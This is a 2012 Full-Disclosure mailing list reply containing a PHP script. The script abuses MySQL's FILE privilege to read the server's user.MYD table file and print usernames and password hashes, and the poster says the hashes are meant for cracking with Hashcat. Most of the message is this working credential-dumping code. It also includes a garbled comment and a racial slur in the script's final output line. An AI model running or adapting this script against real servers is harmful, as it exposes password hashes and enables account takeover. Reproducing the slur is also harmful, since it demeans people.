[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]
Re: [Full-disclosure] MySQL (Linux) Database Privilege Elevation Zeroday Exploit
- To: <full-disclosure@xxxxxxxxxxxxxxxxx>
- Subject: Re: [Full-disclosure] MySQL (Linux) Database Privilege Elevation Zeroday Exploit
- From: kai@xxxxxxxxx
- Date: Tue, 04 Dec 2012 07:25:32 +0700
Hi all,
wrote some shitcode for mysql user&hash enumeration when having FILE
privilege. surely you could do it with simple bash one-liner using
mysql+grep+sed, but we're not going the easy way, right?
the first thought was "hey, what about changing root password directly
in file user.MYD?" but then...
file_name cannot be an existing file, which among other things
prevents files such as /etc/passwd and database tables from being
destroyed.
anyway we have Nvidia cards and Hashcat.
Cheers,
Kai
<?php
// Ã?¿Ã?µÃ?¹Ã? Ã?°Ã?»i Ã?²Ã? eÃ?â?? Ã?´Ã?¾Ã?¼Ã?°Ã?³Ã?¾Ã?â??
$host="localhost";
$port="3306";
$db="loltest"; # db for loading file contents. $user must have privileges to
write in it:
## mysql -u root -p
## create database loltest;
## create user "loltest"@"localhost" identified by "asdasdasdasd";
## grant all privileges on loltest.* to "loltest"@"localhost";
## grant FILE on *.* to "loltest"@"localhost";
## flush privileges;
$user="loltest"; # user with FILE privilege
$pass="asdasdasdasd";
$file="/var/lib/mysql/mysql/user.MYD"; # change to correct path if it differs
echo "-> connecting.. ";
$link=mysql_connect("".$host.":".$port."",$user,$pass) or die("cant connect:
".mysql_error()."\n");
echo "OK\n-> trying to select `mysql` db.. ";
$rez=mysql_select_db("mysql");
if (!$rez) {
echo "OK, \$user $user has no access to `mysql`, proceeding..\n";
} else {
echo "\$user $user has access to `mysql`!\n"; # so why do you need this
"exploit"?
die(11);
}
echo "-> selecting db.. ";
mysql_select_db($db) or die ("cannot select db: ".mysql_error()."\n");
echo "OK\n-> trying to drop old table.. ";
$rez=mysql_query("DROP TABLE file;");
if (!$rez) { echo "cannot drop table: ".mysql_error()."\n"; }
echo "OK\n-> creating table.. ";
mysql_query("CREATE TABLE `file` ( `text` LONGBLOB NOT NULL );") or die
("cannot create table: ".mysql_error()."\n");
echo "OK\n-> reading file $file.. ";
mysql_query('LOAD DATA INFILE "'.$file.'" INTO TABLE file LINES TERMINATED BY
"" (`text`);') or die ("cannot load data: ".mysql_error()."\n");
$rez=mysql_query("SELECT * FROM file;");
if (!$rez) { echo "fail. no FILE permission?\n"; }
else {
for ($i=0;$i<mysql_num_fields($rez);$i++) {$name = mysql_field_name($rez,$i);}
$data="";
while ($row = mysql_fetch_array($rez, MYSQL_ASSOC)) {$data .= join
("\r\n",$row);}
if (empty($data)) {
echo "file does not exists or empty?\n";
} else {
echo "OK\n-> result:\n";
$hex = "";
$plain = "";
for ($i=0; $i<strlen($data); $i++) {
$hex .= sprintf("%02X",ord($data[$i]))." ";
}
}
mysql_free_result($rez);
mysql_query("DROP TABLE file;") or die("cannot drop table:
".mysql_error()."\n");
}
#echo " ------------- hex -------------\n".$hex."\n"; #debug
$plain=array();
preg_match_all("/FB 0F F. (.*?) 0(1|2) /s", $hex, $onlygood); # FB 0F F. =
mysql row delimiter (?)
foreach ($onlygood[1] as $string) {
$temp="";
$charz=explode(" ",$string);
foreach ($charz as $char) {
switch ($char) {
case "01": $temp .= ""; break;
case "03": $temp .= " "; break;
case "04": $temp .= " "; break;
case "05": $temp .= " "; break;
case "06": $temp .= " "; break;
case "07": $temp .= " "; break;
case "08": $temp .= " "; break;
case "09": $temp .= " "; break;
case "0A": $temp .= " "; break;
case "0B": $temp .= " "; break;
case "0C": $temp .= " "; break;
case "0D": $temp .= " "; break;
case "0E": $temp .= " "; break;
case "0F": $temp .= " "; break;
case "1A": $temp .= ""; break;
case "2A": $temp .= " *"; break;
default: $temp .= chr(hexdec($char));
}
}
$plain[]=$temp;
}
echo " ------------- plain users -------------\n";
foreach ($plain as $lol) {
echo $lol."\n";
}
mysql_close($link);
echo "\nbl1ng bl1ng n1gg4 :PppPpPPpPPPpP\n";
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/